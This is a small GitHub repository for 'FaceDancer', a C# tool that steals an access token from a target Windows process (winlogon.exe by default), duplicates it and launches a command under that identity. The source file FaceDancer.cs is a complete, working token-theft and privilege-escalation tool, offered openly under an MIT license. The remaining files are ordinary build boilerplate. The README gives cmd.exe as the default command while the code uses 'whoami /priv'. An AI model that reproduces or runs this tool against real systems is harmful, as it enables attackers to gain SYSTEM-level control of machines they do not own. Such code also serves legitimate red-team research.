├── .gitignore ├── FaceDancer.sln ├── FaceDancer ├── FaceDancer.cs ├── FaceDancer.csproj └── Properties │ └── AssemblyInfo.cs ├── LICENSE └── README.md /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.suo 8 | *.user 9 | *.userosscache 10 | *.sln.docstates 11 | 12 | # User-specific files (MonoDevelop/Xamarin Studio) 13 | *.userprefs 14 | 15 | # Build results 16 | [Dd]ebug/ 17 | [Dd]ebugPublic/ 18 | [Rr]elease/ 19 | [Rr]eleases/ 20 | x64/ 21 | x86/ 22 | bld/ 23 | [Bb]in/ 24 | [Oo]bj/ 25 | [Ll]og/ 26 | 27 | # Visual Studio 2015/2017 cache/options directory 28 | .vs/ 29 | # Uncomment if you have tasks that create the project's static files in wwwroot 30 | #wwwroot/ 31 | 32 | # Visual Studio 2017 auto generated files 33 | Generated\ Files/ 34 | 35 | # MSTest test Results 36 | [Tt]est[Rr]esult*/ 37 | [Bb]uild[Ll]og.* 38 | 39 | # NUNIT 40 | *.VisualState.xml 41 | TestResult.xml 42 | 43 | # Build Results of an ATL Project 44 | [Dd]ebugPS/ 45 | [Rr]eleasePS/ 46 | dlldata.c 47 | 48 | # Benchmark Results 49 | BenchmarkDotNet.Artifacts/ 50 | 51 | # .NET Core 52 | project.lock.json 53 | project.fragment.lock.json 54 | artifacts/ 55 | **/Properties/launchSettings.json 56 | 57 | # StyleCop 58 | StyleCopReport.xml 59 | 60 | # Files built by Visual Studio 61 | *_i.c 62 | *_p.c 63 | *_i.h 64 | *.ilk 65 | *.meta 66 | *.obj 67 | *.iobj 68 | *.pch 69 | *.pdb 70 | *.ipdb 71 | *.pgc 72 | *.pgd 73 | *.rsp 74 | *.sbr 75 | *.tlb 76 | *.tli 77 | *.tlh 78 | *.tmp 79 | *.tmp_proj 80 | *.log 81 | *.vspscc 82 | *.vssscc 83 | .builds 84 | *.pidb 85 | *.svclog 86 | *.scc 87 | 88 | # Chutzpah Test files 89 | _Chutzpah* 90 | 91 | # Visual C++ cache files 92 | ipch/ 93 | *.aps 94 | *.ncb 95 | *.opendb 96 | *.opensdf 97 | *.sdf 98 | *.cachefile 99 | *.VC.db 100 | *.VC.VC.opendb 101 | 102 | # Visual Studio profiler 103 | *.psess 104 | *.vsp 105 | *.vspx 106 | *.sap 107 | 108 | # Visual Studio Trace Files 109 | *.e2e 110 | 111 | # TFS 2012 Local Workspace 112 | $tf/ 113 | 114 | # Guidance Automation Toolkit 115 | *.gpState 116 | 117 | # ReSharper is a .NET coding add-in 118 | _ReSharper*/ 119 | *.[Rr]e[Ss]harper 120 | *.DotSettings.user 121 | 122 | # JustCode is a .NET coding add-in 123 | .JustCode 124 | 125 | # TeamCity is a build add-in 126 | _TeamCity* 127 | 128 | # DotCover is a Code Coverage Tool 129 | *.dotCover 130 | 131 | # AxoCover is a Code Coverage Tool 132 | .axoCover/* 133 | !.axoCover/settings.json 134 | 135 | # Visual Studio code coverage results 136 | *.coverage 137 | *.coveragexml 138 | 139 | # NCrunch 140 | _NCrunch_* 141 | .*crunch*.local.xml 142 | nCrunchTemp_* 143 | 144 | # MightyMoose 145 | *.mm.* 146 | AutoTest.Net/ 147 | 148 | # Web workbench (sass) 149 | .sass-cache/ 150 | 151 | # Installshield output folder 152 | [Ee]xpress/ 153 | 154 | # DocProject is a documentation generator add-in 155 | DocProject/buildhelp/ 156 | DocProject/Help/*.HxT 157 | DocProject/Help/*.HxC 158 | DocProject/Help/*.hhc 159 | DocProject/Help/*.hhk 160 | DocProject/Help/*.hhp 161 | DocProject/Help/Html2 162 | DocProject/Help/html 163 | 164 | # Click-Once directory 165 | publish/ 166 | 167 | # Publish Web Output 168 | *.[Pp]ublish.xml 169 | *.azurePubxml 170 | # Note: Comment the next line if you want to checkin your web deploy settings, 171 | # but database connection strings (with potential passwords) will be unencrypted 172 | *.pubxml 173 | *.publishproj 174 | 175 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 176 | # checkin your Azure Web App publish settings, but sensitive information contained 177 | # in these scripts will be unencrypted 178 | PublishScripts/ 179 | 180 | # NuGet Packages 181 | *.nupkg 182 | # The packages folder can be ignored because of Package Restore 183 | **/[Pp]ackages/* 184 | # except build/, which is used as an MSBuild target. 185 | !**/[Pp]ackages/build/ 186 | # Uncomment if necessary however generally it will be regenerated when needed 187 | #!**/[Pp]ackages/repositories.config 188 | # NuGet v3's project.json files produces more ignorable files 189 | *.nuget.props 190 | *.nuget.targets 191 | 192 | # Microsoft Azure Build Output 193 | csx/ 194 | *.build.csdef 195 | 196 | # Microsoft Azure Emulator 197 | ecf/ 198 | rcf/ 199 | 200 | # Windows Store app package directories and files 201 | AppPackages/ 202 | BundleArtifacts/ 203 | Package.StoreAssociation.xml 204 | _pkginfo.txt 205 | *.appx 206 | 207 | # Visual Studio cache files 208 | # files ending in .cache can be ignored 209 | *.[Cc]ache 210 | # but keep track of directories ending in .cache 211 | !*.[Cc]ache/ 212 | 213 | # Others 214 | ClientBin/ 215 | ~$* 216 | *~ 217 | *.dbmdl 218 | *.dbproj.schemaview 219 | *.jfm 220 | *.pfx 221 | *.publishsettings 222 | orleans.codegen.cs 223 | 224 | # Including strong name files can present a security risk 225 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 226 | #*.snk 227 | 228 | # Since there are multiple workflows, uncomment next line to ignore bower_components 229 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 230 | #bower_components/ 231 | 232 | # RIA/Silverlight projects 233 | Generated_Code/ 234 | 235 | # Backup & report files from converting an old project file 236 | # to a newer Visual Studio version. Backup files are not needed, 237 | # because we have git ;-) 238 | _UpgradeReport_Files/ 239 | Backup*/ 240 | UpgradeLog*.XML 241 | UpgradeLog*.htm 242 | ServiceFabricBackup/ 243 | *.rptproj.bak 244 | 245 | # SQL Server files 246 | *.mdf 247 | *.ldf 248 | *.ndf 249 | 250 | # Business Intelligence projects 251 | *.rdl.data 252 | *.bim.layout 253 | *.bim_*.settings 254 | *.rptproj.rsuser 255 | 256 | # Microsoft Fakes 257 | FakesAssemblies/ 258 | 259 | # GhostDoc plugin setting file 260 | *.GhostDoc.xml 261 | 262 | # Node.js Tools for Visual Studio 263 | .ntvs_analysis.dat 264 | node_modules/ 265 | 266 | # Visual Studio 6 build log 267 | *.plg 268 | 269 | # Visual Studio 6 workspace options file 270 | *.opt 271 | 272 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 273 | *.vbw 274 | 275 | # Visual Studio LightSwitch build output 276 | **/*.HTMLClient/GeneratedArtifacts 277 | **/*.DesktopClient/GeneratedArtifacts 278 | **/*.DesktopClient/ModelManifest.xml 279 | **/*.Server/GeneratedArtifacts 280 | **/*.Server/ModelManifest.xml 281 | _Pvt_Extensions 282 | 283 | # Paket dependency manager 284 | .paket/paket.exe 285 | paket-files/ 286 | 287 | # FAKE - F# Make 288 | .fake/ 289 | 290 | # JetBrains Rider 291 | .idea/ 292 | *.sln.iml 293 | 294 | # CodeRush 295 | .cr/ 296 | 297 | # Python Tools for Visual Studio (PTVS) 298 | __pycache__/ 299 | *.pyc 300 | 301 | # Cake - Uncomment if you are using it 302 | # tools/** 303 | # !tools/packages.config 304 | 305 | # Tabs Studio 306 | *.tss 307 | 308 | # Telerik's JustMock configuration file 309 | *.jmconfig 310 | 311 | # BizTalk build output 312 | *.btp.cs 313 | *.btm.cs 314 | *.odx.cs 315 | *.xsd.cs 316 | 317 | # OpenCover UI analysis results 318 | OpenCover/ 319 | 320 | # Azure Stream Analytics local run output 321 | ASALocalRun/ 322 | 323 | # MSBuild Binary and Structured Log 324 | *.binlog 325 | 326 | # NVidia Nsight GPU debugger configuration file 327 | *.nvuser 328 | 329 | # MFractors (Xamarin productivity tool) working folder 330 | .mfractor/ 331 | -------------------------------------------------------------------------------- /FaceDancer.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.168 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "FaceDancer", "FaceDancer\FaceDancer.csproj", "{DACC9D42-D51B-4594-8DBC-EB9DEDC1CCD1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {DACC9D42-D51B-4594-8DBC-EB9DEDC1CCD1}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {DACC9D42-D51B-4594-8DBC-EB9DEDC1CCD1}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {DACC9D42-D51B-4594-8DBC-EB9DEDC1CCD1}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {DACC9D42-D51B-4594-8DBC-EB9DEDC1CCD1}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {7116369D-BC38-4DF6-AF8E-C514284CF7D8} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /FaceDancer/FaceDancer.cs: -------------------------------------------------------------------------------- 1 | using Microsoft.Win32.SafeHandles; 2 | using System; 3 | using System.Diagnostics; 4 | using System.IO; 5 | using System.IO.Pipes; 6 | using System.Linq; 7 | using System.Runtime.InteropServices; 8 | using System.Security.AccessControl; 9 | using System.Security.Principal; 10 | using System.Threading; 11 | 12 | namespace FaceDancer 13 | { 14 | class FaceDancer 15 | { 16 | [DllImport("advapi32.dll", SetLastError = true)] 17 | [return: MarshalAs(UnmanagedType.Bool)] 18 | internal static extern bool OpenProcessToken(IntPtr ProcessHandle, 19 | uint desiredAccess, out IntPtr TokenHandle); 20 | 21 | 22 | [DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)] 23 | internal extern static bool DuplicateTokenEx( 24 | IntPtr hExistingToken, 25 | uint dwDesiredAccess, 26 | IntPtr lpTokenAttributes, 27 | uint ImpersonationLevel, 28 | TOKEN_TYPE TokenType, 29 | out IntPtr phNewToken); 30 | 31 | internal enum TOKEN_TYPE 32 | { 33 | TokenPrimary = 1, 34 | TokenImpersonation 35 | } 36 | 37 | [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] 38 | internal static extern bool CreateProcessWithTokenW(IntPtr hToken, IntPtr dwLogonFlags, 39 | string lpApplicationName, string lpCommandLine, IntPtr dwCreationFlags, 40 | IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFO lpStartupInfo, 41 | out PROCESS_INFORMATION lpProcessInformation); 42 | 43 | internal enum CreationFlags 44 | { 45 | DefaultErrorMode = 0x04000000, 46 | NewConsole = 0x00000010, 47 | NewProcessGroup = 0x00000200, 48 | SeparateWOWVDM = 0x00000800, 49 | Suspended = 0x00000004, 50 | UnicodeEnvironment = 0x00000400, 51 | ExtendedStartupInfoPresent = 0x00080000 52 | } 53 | 54 | [StructLayout(LayoutKind.Sequential)] 55 | internal struct PROCESS_INFORMATION 56 | { 57 | public IntPtr hProcess; 58 | public IntPtr hThread; 59 | public int dwProcessId; 60 | public int dwThreadId; 61 | } 62 | 63 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] 64 | internal struct STARTUPINFO 65 | { 66 | public Int32 cb; 67 | public IntPtr lpReserved; 68 | public IntPtr lpDesktop; 69 | public IntPtr lpTitle; 70 | public Int32 dwX; 71 | public Int32 dwY; 72 | public Int32 dwXSize; 73 | public Int32 dwYSize; 74 | public Int32 dwXCountChars; 75 | public Int32 dwYCountChars; 76 | public Int32 dwFillAttribute; 77 | public STARTF dwFlags; 78 | public Int16 wShowWindow; 79 | public Int16 cbReserved2; 80 | public IntPtr lpReserved2; 81 | public IntPtr hStdInput; 82 | public IntPtr hStdOutput; 83 | public IntPtr hStdError; 84 | } 85 | 86 | [Flags] 87 | internal enum STARTF : uint 88 | { 89 | STARTF_USESHOWWINDOW = 0x00000001, 90 | STARTF_USESIZE = 0x00000002, 91 | STARTF_USEPOSITION = 0x00000004, 92 | STARTF_USECOUNTCHARS = 0x00000008, 93 | STARTF_USEFILLATTRIBUTE = 0x00000010, 94 | STARTF_RUNFULLSCREEN = 0x00000020, // ignored for non-x86 platforms 95 | STARTF_FORCEONFEEDBACK = 0x00000040, 96 | STARTF_FORCEOFFFEEDBACK = 0x00000080, 97 | STARTF_USESTDHANDLES = 0x00000100, 98 | } 99 | 100 | [DllImport("kernel32.dll", SetLastError = true)] 101 | static extern bool CloseHandle(IntPtr hObject); 102 | 103 | static void Main(string[] args) 104 | { 105 | int procId; 106 | string file; 107 | 108 | if (args.Length < 2) 109 | { 110 | file = "whoami /priv"; 111 | if (args.Length == 0) 112 | { 113 | // If we don't have a process ID as an argument, find winlogon.exe 114 | procId = Process.GetProcessesByName("winlogon").First().Id; 115 | } 116 | else if (args[0].Contains('.')) 117 | { 118 | procId = Process.GetProcessesByName("winlogon").First().Id; 119 | if (args != null) 120 | { 121 | file = args[0]; 122 | } 123 | } 124 | else 125 | { 126 | procId = Convert.ToInt32(args[0]); 127 | } 128 | } 129 | else 130 | { 131 | procId = Convert.ToInt32(args[0]); 132 | file = args[1]; 133 | } 134 | Console.WriteLine("Stealing token from PID " + procId); 135 | 136 | IntPtr tokenHandle = IntPtr.Zero; 137 | IntPtr dupHandle = IntPtr.Zero; 138 | 139 | SafeWaitHandle procHandle = new SafeWaitHandle(Process.GetProcessById(procId).Handle, true); 140 | Console.WriteLine("Process handle: True"); 141 | 142 | bool procToken = OpenProcessToken(procHandle.DangerousGetHandle(), (uint)TokenAccessLevels.MaximumAllowed, out tokenHandle); 143 | Console.WriteLine("OpenProcessToken: " + procToken); 144 | 145 | bool duplicateToken = DuplicateTokenEx(tokenHandle, (uint)TokenAccessLevels.MaximumAllowed, IntPtr.Zero, 146 | (uint)TokenImpersonationLevel.Impersonation, TOKEN_TYPE.TokenImpersonation, out dupHandle); 147 | Console.WriteLine("DuplicateTokenEx: " + duplicateToken); 148 | WindowsIdentity ident = new WindowsIdentity(dupHandle); 149 | Console.WriteLine("Impersonated user: " + ident.Name); 150 | 151 | STARTUPINFO startInfo = new STARTUPINFO(); 152 | 153 | PipeSecurity sec = new PipeSecurity(); 154 | sec.SetAccessRule(new PipeAccessRule("NT AUTHORITY\\Everyone", PipeAccessRights.FullControl, AccessControlType.Allow)); 155 | 156 | using (AnonymousPipeServerStream pipeServer = new AnonymousPipeServerStream(PipeDirection.In, HandleInheritability.Inheritable, 4096, sec)) 157 | { 158 | using (AnonymousPipeClientStream pipeClient = new AnonymousPipeClientStream(PipeDirection.Out, pipeServer.ClientSafePipeHandle)) 159 | { 160 | // Set process to use anonymous pipe for input/output 161 | startInfo.hStdOutput = pipeClient.SafePipeHandle.DangerousGetHandle(); 162 | startInfo.hStdError = pipeClient.SafePipeHandle.DangerousGetHandle(); 163 | startInfo.dwFlags = STARTF.STARTF_USESTDHANDLES | STARTF.STARTF_USESHOWWINDOW; 164 | // END NAME PIPE INITIALIZATION 165 | 166 | PROCESS_INFORMATION newProc = new PROCESS_INFORMATION(); 167 | using (StreamReader reader = new StreamReader(pipeServer)) 168 | { 169 | bool createProcess = CreateProcessWithTokenW(dupHandle, IntPtr.Zero, null, file, IntPtr.Zero, IntPtr.Zero, "C:\\Temp", ref startInfo, out newProc); 170 | Process proc = Process.GetProcessById(newProc.dwProcessId); 171 | while (!proc.HasExited) 172 | { 173 | Thread.Sleep(1000); 174 | } 175 | pipeClient.Close(); 176 | string output = reader.ReadToEnd(); 177 | Console.WriteLine("Started process with ID " + newProc.dwProcessId); 178 | Console.WriteLine("CreateProcess return code: " + createProcess); 179 | Console.WriteLine("Process output: " + output); 180 | } 181 | 182 | CloseHandle(tokenHandle); 183 | CloseHandle(dupHandle); 184 | } 185 | } 186 | } 187 | } 188 | } 189 | -------------------------------------------------------------------------------- /FaceDancer/FaceDancer.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {DACC9D42-D51B-4594-8DBC-EB9DEDC1CCD1} 8 | Exe 9 | FaceDancer 10 | FaceDancer 11 | v3.5 12 | 512 13 | true 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /FaceDancer/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("FaceDancer")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("FaceDancer")] 13 | [assembly: AssemblyCopyright("Copyright © 2019")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("dacc9d42-d51b-4594-8dbc-eb9dedc1ccd1")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 001SPARTaN 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # FaceDancer 2 | Playing around with token manipulation in C#. This will try to steal a token from the target PID (defaults to winlogon.exe), and start the specified executable (defaults to cmd.exe). 3 | 4 | ## Usage 5 | FaceDancer.exe [PID] [C:\Path\To\Executable.exe] 6 | --------------------------------------------------------------------------------